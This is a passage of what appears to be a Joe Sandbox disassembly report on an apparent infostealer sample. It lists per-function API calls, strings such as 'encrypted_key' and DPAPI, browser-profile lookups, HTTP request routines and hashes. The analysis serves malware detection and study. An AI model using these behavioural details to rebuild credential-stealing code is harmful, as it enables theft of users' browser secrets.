                                                                                                                                                                                            • Part of subcall function 00030549: lstrcpyA.KERNEL32(00000000,00000000,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 00030581
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • SetEnvironmentVariableA.KERNEL32(?,00057194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,000567C3,?,?,?,?,?,?,?,?,0002DB0A), ref: 00028447
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0002DB0A), ref: 0002845B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 000283E6, 000283EB, 00028405
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                          • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                          • API String ID: 2929475105-4027016359
                                                                                                                                                                                          • Opcode ID: 2bf83f40048c1de22465f0279a7e38dd8e977ca11d074763c6cb57669f0c35fc
                                                                                                                                                                                          • Instruction ID: afac77cffcd06072af3e5a3305be3fcc6d14c46bae0fad79ab7dfacacffa80bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bf83f40048c1de22465f0279a7e38dd8e977ca11d074763c6cb57669f0c35fc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A314C75901924EFDF12AB68FD0A4AE7BF4AB4C700B1241E5F80CA7122DB3159C1CFA1
                                                                                                                                                                                          Function 00036DC6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00036DCD
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,0000001C), ref: 00036DD8
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00036E5C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                                          • String ID: ERROR
                                                                                                                                                                                          • API String ID: 591506033-2861137601
                                                                                                                                                                                          • Opcode ID: 680ee33fc8a4fd1dbecfb935ca144a3f49d3e7480ec3036390d8bed2a4e29885
                                                                                                                                                                                          • Instruction ID: e3a81b435414b81e8be89a48185d4c53fc79590f76f4b14482939200326c6a4d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 680ee33fc8a4fd1dbecfb935ca144a3f49d3e7480ec3036390d8bed2a4e29885
                                                                                                                                                                                          • Instruction Fuzzy Hash: 51114C7190150AAFCB41FFB4D906AEDBBB4BF04310F504231E819A7562E731EAA58FD5
                                                                                                                                                                                          Function 0002B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0002B3D7
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002B529
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002B544
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002B596
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 211194620-0
                                                                                                                                                                                          • Opcode ID: 9aa5f5ff5987286ca2cde7bfe939de6f3c76d0ad02a2e34c7d155892d93f972e
                                                                                                                                                                                          • Instruction ID: 1a13fafd7224498a13c21043a35a50fa83f67ed5d1b8c44c04769726c46b9dcd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9aa5f5ff5987286ca2cde7bfe939de6f3c76d0ad02a2e34c7d155892d93f972e
                                                                                                                                                                                          • Instruction Fuzzy Hash: C871C732900129EBCF02FBA4FD469DEB775AF14305F514121F904BB167DB21AE9ACBA1
                                                                                                                                                                                          Function 0002D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00027FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                            • Part of subcall function 00027FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                            • Part of subcall function 00027FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                            • Part of subcall function 00027FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                            • Part of subcall function 00027FAC: CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                            • Part of subcall function 00031E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00036931,?), ref: 00031E37
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,?,00057538,0005688A), ref: 0002D49F
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002D4B2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                                          • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                          • API String ID: 161838763-3310892237
                                                                                                                                                                                          • Opcode ID: 52fcd6c2a3bb6656b1685485b57c9c1edcea83a4547395c9a719b7db1fe82aed
                                                                                                                                                                                          • Instruction ID: 3fbf2a0b8d59d43e932cf64b78bec1aba3c304d8ccdc73d32c2254d026ac219b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 52fcd6c2a3bb6656b1685485b57c9c1edcea83a4547395c9a719b7db1fe82aed
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E41C436901529ABCF02FBA4E9579CE77B8AF14304F510120FD04B7257EB64AE598BE1
                                                                                                                                                                                          Function 0002819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00027FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                            • Part of subcall function 00027FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                            • Part of subcall function 00027FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                            • Part of subcall function 00027FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                            • Part of subcall function 00027FAC: CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                            • Part of subcall function 00031E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00036931,?), ref: 00031E37
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0002CC90,?,?), ref: 000281E5
                                                                                                                                                                                            • Part of subcall function 00028048: CryptStringToBinaryA.CRYPT32(00026724,00000000,00000001,00000000,?,00000000,00000000), ref: 00028060
                                                                                                                                                                                            • Part of subcall function 00028048: LocalAlloc.KERNEL32(00000040,?,?,?,00026724,?), ref: 0002806E
                                                                                                                                                                                            • Part of subcall function 00028048: CryptStringToBinaryA.CRYPT32(00026724,00000000,00000001,00000000,?,00000000,00000000), ref: 00028084
                                                                                                                                                                                            • Part of subcall function 00028048: LocalFree.KERNEL32(?,?,?,00026724,?), ref: 00028093
                                                                                                                                                                                            • Part of subcall function 000280A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0002823B), ref: 000280C4
                                                                                                                                                                                            • Part of subcall function 000280A1: LocalAlloc.KERNEL32(00000040,0002823B,?,?,0002823B,0002CB95,?,?,?,?,?,?,?,0002CC90,?,?), ref: 000280D8
                                                                                                                                                                                            • Part of subcall function 000280A1: LocalFree.KERNEL32(0002CB95,?,?,0002823B,0002CB95,?,?,?,?,?,?,?,0002CC90,?,?), ref: 000280FD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                                          • String ID: $"encrypted_key":"$DPAPI
                                                                                                                                                                                          • API String ID: 2311102621-738592651
                                                                                                                                                                                          • Opcode ID: 30d205bdc29c7125577b49914f16070e0eec1987e0a034a7be183dfccfdea5e2
                                                                                                                                                                                          • Instruction ID: 1df2ae0471dea050cfae521ab67177db034fb809fa625d6ba9f207b00f30805a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 30d205bdc29c7125577b49914f16070e0eec1987e0a034a7be183dfccfdea5e2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1021F23AA41219EBCF18EA94FC419DE73B8EF81360F608465E910A7182DF34AA4DCB50
                                                                                                                                                                                          Function 0003683E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00026963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000269C5
                                                                                                                                                                                            • Part of subcall function 00026963: StrCmpCA.SHLWAPI(?), ref: 000269DF
                                                                                                                                                                                            • Part of subcall function 00026963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00026A0E
                                                                                                                                                                                            • Part of subcall function 00026963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00026A4D
                                                                                                                                                                                            • Part of subcall function 00026963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00026A7D
                                                                                                                                                                                            • Part of subcall function 00026963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00026A88
                                                                                                                                                                                            • Part of subcall function 00026963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00026AAC
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 00036873
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                                                                                          • String ID: ERROR$ERROR
                                                                                                                                                                                          • API String ID: 3086566538-2579291623
                                                                                                                                                                                          • Opcode ID: f6565b7759812123ac37af109db7c412c3cff1467cc0eebfe700af49348555d0
                                                                                                                                                                                          • Instruction ID: 7160e1648d31c48a36f46949a67d6b82a2f4886f593184267b354d50ba182317
                                                                                                                                                                                          • Opcode Fuzzy Hash: f6565b7759812123ac37af109db7c412c3cff1467cc0eebfe700af49348555d0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 78011D75A00128BBCB22BBB4E8479CE37ACAF14300F544261BD25E7257EB21E94986D2
                                                                                                                                                                                          Function 00036E97 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,?,?), ref: 00036EFE
                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
